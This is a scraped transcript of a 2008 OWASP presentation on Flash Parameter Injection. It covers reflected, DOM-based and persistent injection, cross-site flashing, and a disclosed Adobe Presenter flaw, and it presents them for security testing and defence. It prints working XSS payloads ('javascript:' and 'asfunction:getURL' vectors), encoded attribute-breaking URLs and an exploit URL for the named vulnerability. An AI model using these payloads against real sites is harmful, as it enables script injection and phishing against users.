1 / 52

Flash Parameter Injection

Flash Parameter Injection. Ayal Yogev Adi Sharabani IBM Rational Application Security {ayal, adish}. OWASP. 25/09/2008. The OWASP Foundation. http://www.owasp.org. Agenda. Flash 101 Flash Security The Problem Flash Parameter Injection Real Example Testing. F lash 101. Background.

kiet
Download Presentation

Flash Parameter Injection

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Flash Parameter Injection Ayal Yogev Adi Sharabani IBM Rational Application Security {ayal, adish} OWASP 25/09/2008 The OWASP Foundation http://www.owasp.org

  2. Agenda • Flash 101 • Flash Security • The Problem • Flash Parameter Injection • Real Example • Testing

  3. Flash 101

  4. Background • Introduced in 1996 • Adds animation and interactivity to Web pages • Contains a scripting language: Action Script • Very popular • Installed in over 99% of PCs • Advanced technologies: • Flex • Adobe AIR http://www.adobe.com/products/player_census/flashplayer/

  5. <body> <h1>My Flash Movie</h1> <objecttype="application/x-shockwave-flash"> <paramname="allowScriptAccess"value="sameDomain" /> <paramname="movie"value="movie.swf" /> <paramname="quality"value="high" /> <paramname="bgcolor"value="#ffffff" /> <embedsrc="movie.swf></embed> </object> </body> Host (Browser) Flash Player HTML Flash Movie (SWF) Accessing Flash movies • Can be embedded in HTML pages

  6. <html> <bodymarginwidth="0"marginheight="0"> <embedwidth="100%"height="100%“ name="plugin"src="http://host/movie.swf" type="application/x-shockwave-flash"/> </body> </html> HTML Accessing Flash movies • Can be embedded in HTML pages • Can be accessed directly • http://host/movie.swf • A “dummy” HTML page may be created (browser dependant) • DOM access according to policy • Example (Firefox):

  7. if (_root.myparam == undefined) { _root.myparam = “my default value”; } Global Flash Variables • Action Script supports Global Variables • Global Variables can be assigned from outside the movie • Common use:

  8. <body> <objecttype="application/x-shockwave-flash" data=" " width="600"height="345"> </object> </body> HTML Global Flash Variables • Action Script supports Global Variables • Global Variables can be assigned from outside the movie • Assigning Global Variables as parameters • Direct Reference • Embedded URI • Flash Attributes http://host/movie.swf?a=5&b=hello movie.swf?a=5&b=hello

  9. HTML Global Flash Variables • Action Script supports Global Variables • Global Variables can be assigned from outside the movie • Assigning Global Variables as parameters • Direct Reference • Embedded URI • Flash Attributes width="600"height="345"> </object> </body> <body> <objecttype="application/x-shockwave-flash" data="movie.swf" <body> <objecttype="application/x-shockwave-flash" data="movie.swf?" a=5&b=hello flashvars=" "

  10. lash Security

  11. Previous Research • Bypassing JavaScript Filters – the Flash! Attack Eye on Security, August 2002 • Misuse of Macromedia Flash Ads clickTAG Option May Lead to Privacy BreachScan Security Wire, April 2003 • Testing Flash Applications Stefano Di Paola, May 2007 • Finding Vulnerabilities in Flash ApplicationsStefano Di Paola, November 2007

  12. Controlling Global Flash Variables can result in... • Cross-Site Flashing • Cross-Site Scripting through Flash • Phishing • Flow Manipulation • …

  13. Flash Player if(_root.movieURI ==undefined) { _root.movieURI = "http://host/movie.swf"; } loadMovieNum(_root.movieURI, 1); Flash Player Malicious Flash Flash Movie Cross-Site Flashing • A vulnerable movie is tricked into loading a malicious movie • The malicious movie gets access to the same sandbox • Can be achieved using methods like loadMovie*: • Attack Vector http://host/movie.swf?movieURI=maliciousFile.swf

  14. Cross-Site Scripting through Flash • Classic XSS using a vulnerable Flash file • Can be triggered by the use of global flash variables in: • getURL using payload javascript:alert('XSS') • Load* functions using payload asfunction:getURL,javascript:alert('XSS') • TextField.htmlText using payload <img src='javascript:alert(“XSS”)//.jpg'> • ...

  15. Cross-Site Scripting through Flash (Example) • Consider movie.swf containing the code: if(_root.url ==undefined) { _root.url = "http://host/"; } getURL(_root.url);

  16. Normal Usage

  17. Normal Usage

  18. Normal Usage

  19. Cross-Site Scripting through Flash (Example) Attack Vector: http://host/movie.swf?url=javascript:alert(‘gotcha!’) if(_root.url ==undefined) { _root.url = "http://host/"; } getURL(_root.url);

  20. Cross-Site Scripting through Flash (Example)

  21. Cross-Site Scripting through Flash (Example)

  22. Cross-Site Scripting through Flash (Example)

  23. The Problem

  24. Host (Browser) Host (Browser) Flash Player Flash Player Flash Movie (SWF) Flash Movie (SWF) The Missing Link • Flash cannot always load without the original HTML • Flash movies may rely on parts of the DOM to execute • Use JavaScript variables and methods • Use HTML Dom elements • Direct access to flash may be restricted due to security

  25. The Missing Link - Example

  26. The Missing Link - Example

  27. The Missing Link - Example

  28. The Missing Link - Example

  29. The Missing Link - Example

  30. Known examples of Flash attacks involve accessing the movie directly

  31. BUT… Some Flash movies cannot load when accessed directly

  32. FPI Injecting global variables into Flash in its original HTML environment

  33. FPI Techniques

  34. CGI <object type="application/x-shockwave-flash" data=""></object>'; HTML Reflected FPI • Possible when the location of the Flash movie is retrieved through a URL parameter: • Attack example: # Embed the Flash movie print '<object type="application/x-shockwave-flash" data="' .$params{movie}. '"></object>'; http://host/index.cgi?movie=movie.swf?globalVar=e-v-i-l movie.swf?globalVar=e-v-i-l

  35. CGI HTML Reflected FPI (Piggybacking FlashVars) • Attack possible when global flash variables are received from HTML parameters without sanitization: • Attack occurs when victim is lured to click on a link line: # Read the 'language' parameter my $language = $params{language}; # Embed the Flash movie print '<object type="application/x-shockwave-flash" data="movie.swf" flashvars="language=' . $language.replace(’"’,’’). '"></object>'; <html> … <objecttype="application/x-shockwave-flash" data="movie.swf" flashvars="language= "> </object> … English&globalVar=e-v-i-l %26 is decoded to & http://host/index.cgi?language=English%26globalVar=e-v-i-l English%26globalVar=e-v-i-l

  36. <objecttype='application/x-shockwave-flash' data='movie.swf' width=' '> </object> CGI HTML FlashVars Injection • Possible when an attribute of object tag is received as a parameter: • Attack vector: # Embed the flash movie print "<object type='application/xshockwave-flash' " . "data='movie.swf' width='" . $params{width} . "'></object>"; 600%27%20flashvars=%27globalVar=e-v-i-l http://host/index.cgi?width=600%27%20flashvars=%27globalVar=e-v-i-l 600' flashvars='globalVar=e-v-i-l Decode values

  37. HTML DOM Based FPI • document.location is used as a global Flash variable: <scripttype="text/javascript"language="JavaScript"> vars = ''; varloc = encodeURI(document.location); s += '<object>'; s += ' <embed src="movie.swf" flashvars="location='+ loc +'">'; s += ' </embed>'; s += '</object>'; document.write(s); </script>

  38. HTML DOM Based FPI (continued) • Attack vector: • The global variable is injected into the Flash movie embedded inside the DOM: http://host/index.htm#&globalVar=e-v-i-l http://host/index.htm#&globalVar=e-v-i-l <object> <embedsrc="movie.swf" flashvars="location="> </embed> </object>

  39. DOM Based FPI (continued) • JavaScript function encodeURI is not sufficient in this case • Can prevent DOM based XSS but not DOM Based FPI • Does not encode all characters (e.g. ‘&’,’?’) • encodeURIComponent,escape or similar methods must be used • Appropriate encoding must be used (depending on context) • Attack is invisible to IDS and IPS • Data following ‘#’ is not sent to the server(‘?’ also works, but data following it is sent to the server)

  40. Persistent FPI • Shared local Flash objects (a.k.a. Flash cookies) • Used to store persistent data across multiple sessions and save Flash state • Storing shared local Flash objects: // Create a shared object mySharedObject = SharedObject.getLocal("sharedObjName"); // Store data in the shared object mySharedObject.data.name ="jsmith"; mySharedObject.data.homepage ="http://demo.testfire.net"; // Flush mySharedObject.flush();

  41. Persistent FPI (continued) • Loading shared local Flash objects: // Create a new shared object or read an existing one mySharedObject = SharedObject.getLocal("sharedObjName"); // Check whether variable name exists if(mySharedObject.data.name ==null) { // Shared object doesn't exist } else { // Read the name name = mySharedObject.data.name; // Read the homepage homepage = mySharedObject.data.homepage; }

  42. // Create a new shared object or read an existing one mySharedObject = SharedObject.getLocal(“urlToLoad"); // Check whether there is a shared object saved if(mySharedObject.data.url == null) { // Store the URL in a shared object mySharedObject.data.url = _root.inputURL; } // Get the URL getURL(mySharedObject.data.url); Host (Browser) Flash Player Flash Player Flash Movie Flash Movie Persistent FPI (continued) • Shared local Flash object is controlled by user input • Object is used inside the getURL method

  43. Persistent FPI (continued) • After the first infection, XSS will be executed every time the movie is loaded • Attack can persist after vulnerability is fixed • IDS or IPS will only be able to detect initial infection

  44. ExampleCVE-2008-3515, CVE-2008-3516

  45. HTML Adobe Presenter FPI Vulnerability • Illustration of the automatically created HTML: function showFlash(swf, w, h, loop) { var myLocation = document.location; //... s +='<param name="FlashVars" value="'+ 'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />' //... document.write(s); } function showFlash(swf, w, h, loop) { var myLocation = encodeURI(document.location); //... s +='<param name="FlashVars" value="'+ 'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />' //... document.write(s); }

  46. Adobe Presenter FPI Vulnerability (continued) • Movie Viewer.swf vulnerable to XSS through Flash: • Global parameter _url with payload “javascript:alert(‘XSS’)” • Global parameter baseurl with payload “asfunction:getURL,javascript:alert(‘XSS’)” • Works in Flash Player version 9,0,47,0 on both IE and Firefox • DOM based FPI allows the Flash to load within original HTML • Invisible to IPS/IDS • Vendors must recompile their Flash files to fix the problem http://host/index.htm#&_url=javascript:alert(document.domain)

  47. Testing

  48. Testing • Identify controlled Flash parameters: • Query parameters (from HTML) • FlashVars (from HTML) • Uninstantiated variables (from Action Script) • Locate potentially dangerous code: • Where controlled Flash parameters are used inside methods like: getURL, loadMovie, etc. • Save sequences leading to potentially dangerous code • Associate with parameter

  49. Testing (continued) • Mutation - Inject values into the parameters • XSS: javascript:window.open(‘http://my.site’) • XSF: http://my.site/movie.swf • Phishing: http://my.site • Validation • Play relevant sequences belonging to mutated parameter • Verify test results • Browser events • Action Script level Test Flash movie within its original HTML environment

More Related